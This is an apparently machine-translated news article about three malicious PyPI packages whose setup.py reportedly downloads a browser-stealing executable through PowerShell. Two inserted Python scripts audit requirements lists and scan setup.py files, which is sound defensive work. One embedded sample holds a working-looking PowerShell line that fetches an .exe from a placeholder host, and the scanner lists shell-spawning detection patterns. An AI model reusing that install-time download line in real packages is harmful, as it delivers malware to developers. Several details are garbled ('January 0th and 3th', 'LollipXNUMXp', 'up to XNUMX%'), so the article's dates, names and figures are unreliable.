Programmers: Look for these information stealers in the Python Package Index

Three malicious packages containing information stealers were recently discovered in, and subsequently removed from, the PyPI repository.

Fortinet researchers found three packages uploaded between January 0th and 3th by a user named "LollipXNUMXp". The three are called "colorslib", "httpslib" and "libhttps"; if you have installed any of them, remove them immediately.

Typically, cybercriminals seeking to compromise Python developers' machines through PyPI rely on typosquatting: they give their malicious packages names that are nearly identical to those of legitimate projects, so that a careless or hurried developer installs the malicious package in place of the genuine one without noticing.

Browser data theft

This campaign, however, is different: all three packages have unique names rather than look-alike ones. To build trust, the attacker wrote full descriptions for each package. While the combined downloads of the three packages barely surpassed five hundred, the impact could still be significant if any of those installs sit inside a larger software supply chain, the post notes.
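Both defences described above can be automated before `pip install` ever runs: a blocklist catches packages with unique names once they are publicly reported, and an edit-distance check catches the more common typosquats. The script below is an added example written for this page, not code from Fortinet or the article; the popular-package list, the sample requirements file and the distance threshold are constructed assumptions, while the three blocklisted names are the ones the article reports.

```python
"""Audit a requirements list for known-malicious PyPI names and near-misses of popular ones."""
from __future__ import annotations

import re

# Names the article reports were removed from PyPI (known-bad blocklist).
KNOWN_BAD = {"colorslib", "httpslib", "libhttps"}

# A small, constructed allowlist of widely used packages to compare against;
# a real deployment would use your organisation's approved-package list.
POPULAR = {"requests", "urllib3", "colorama", "numpy", "cryptography", "pyyaml"}

# Constructed sample requirements file: one clean pin, one blocklisted name,
# two typosquats (letter swap, dropped letter) and one clean bare name.
SAMPLE_REQUIREMENTS = """requests==2.31.0
colorslib          # reported as malicious
reqeusts
urlib3>=1.26
numpy
"""


def normalize(name: str) -> str:
    """PEP 503 normalisation: lower-case and collapse runs of '-', '_' and '.' into '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def parse_requirement_name(line: str) -> str | None:
    """Return the project name from a requirements.txt line, or None for blanks/comments/options."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None
    m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)", line)
    return m.group(1) if m else None


def audit(requirements_text: str, max_distance: int = 2) -> list[tuple[str, str]]:
    """Return (name, reason) pairs for blocklisted names and names close to a popular package."""
    findings: list[tuple[str, str]] = []
    for raw in requirements_text.splitlines():
        name = parse_requirement_name(raw)
        if name is None:
            continue
        norm = normalize(name)
        if norm in KNOWN_BAD:
            findings.append((name, "known-malicious package"))
            continue
        if norm in POPULAR:
            continue
        # Closest popular name; sorted() makes ties deterministic.
        closest = min(sorted(POPULAR), key=lambda p: levenshtein(norm, p))
        d = levenshtein(norm, closest)
        if d <= max_distance:
            findings.append((name, f"possible typosquat of '{closest}' (distance {d})"))
    return findings


if __name__ == "__main__":
    for name, reason in audit(SAMPLE_REQUIREMENTS):
        print(f"{name}: {reason}")
```

Run it against your own `requirements.txt` by passing the file contents to `audit()`; a non-empty result should block the install in CI. The distance threshold is a trade-off: 2 catches swapped and dropped letters but will also flag legitimately similar short names, so review findings rather than auto-rejecting them.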

In all three cases the packages ship a "setup.py" that, when run, launches a PowerShell command to download an executable called "Oxyz.exe" from the Internet. According to the researchers, this executable is malicious and steals information from the browser. Exactly what the malware collects is not known, but information stealers typically go after saved passwords, credit card details, cryptocurrency wallets and other valuable data.
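Because the malicious behaviour lives in `setup.py` and runs at install time, a defender can inspect a downloaded sdist statically before installing it. The scanner below is an added example for this page, not Fortinet's or the article's code: it parses `setup.py` into an AST and flags calls that spawn a shell or fetch remote content, together with any string arguments that mention PowerShell or an `.exe`. The call lists, the regex and the two embedded `setup.py` samples (one mimicking the pattern the article describes, with a placeholder URL, and one clean) are constructed assumptions.

```python
"""Static pre-install scan of a setup.py for install-time command execution and downloads."""
from __future__ import annotations

import ast
import re

# Call targets that hand control to a shell or run arbitrary code at install time.
EXEC_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen", "exec", "eval"}
# Call targets that fetch remote content at install time.
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"}
# String indicators matching the behaviour described in the article.
SUSPICIOUS_STRINGS = re.compile(r"powershell|cmd\.exe|\.exe\b", re.IGNORECASE)

# Constructed sample mimicking the reported pattern; the URL is a placeholder.
SAMPLE_SETUP_PY = '''from setuptools import setup
import subprocess

# install-time hook: spawns PowerShell to fetch a remote executable
subprocess.run(["powershell", "-Command",
                "Invoke-WebRequest https://example.invalid/Oxyz.exe -OutFile x.exe"])

setup(name="colorslib", version="1.0.0", packages=[])
'''

# Constructed clean sample: declarative metadata only.
CLEAN_SETUP_PY = '''from setuptools import setup
setup(name="demo", version="0.1.0", packages=["demo"])
'''


def dotted_name(node: ast.AST) -> str | None:
    """Turn a call target like `subprocess.run` or `os.system` into its dotted string."""
    parts: list[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. a call on a call result; not resolvable statically


def string_literals(node: ast.AST) -> list[str]:
    """All string constants nested anywhere inside a node, in source order."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def scan_setup_py(source: str) -> list[dict]:
    """Return one finding per exec/fetch call, with the line and any suspicious string arguments."""
    findings: list[dict] = []
    # ast.walk visits nested functions too, so hooks inside a custom cmdclass are covered.
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        target = dotted_name(node.func)
        if target in EXEC_CALLS or target in FETCH_CALLS:
            findings.append({
                "line": node.lineno,
                "call": target,
                "kind": "exec" if target in EXEC_CALLS else "fetch",
                "indicators": [s for s in string_literals(node) if SUSPICIOUS_STRINGS.search(s)],
            })
    return findings


if __name__ == "__main__":
    for f in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {f['line']}: {f['kind']} via {f['call']} -> {f['indicators']}")
```

A legitimate `setup.py` rarely needs to spawn a shell or download anything, so any `exec` or `fetch` finding is worth a manual look even when the indicator list is empty. The scan is deliberately simple and will miss code that hides the call target behind `getattr` or builds the command from concatenated fragments; it is a cheap first filter, not a substitute for sandboxed installation.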

The report also found that the detection rate for these executables is somewhat low (up to XNUMX%), meaning attackers can successfully exfiltrate data even from endpoints protected by antivirus products.

Although the malicious packages have already been removed from PyPI, nothing prevents the attackers from simply re-uploading them under different names and from a different account. The best defence against this kind of supply chain attack is therefore to be extra careful when pulling code dependencies from public repositories.

Via: BleepingComputer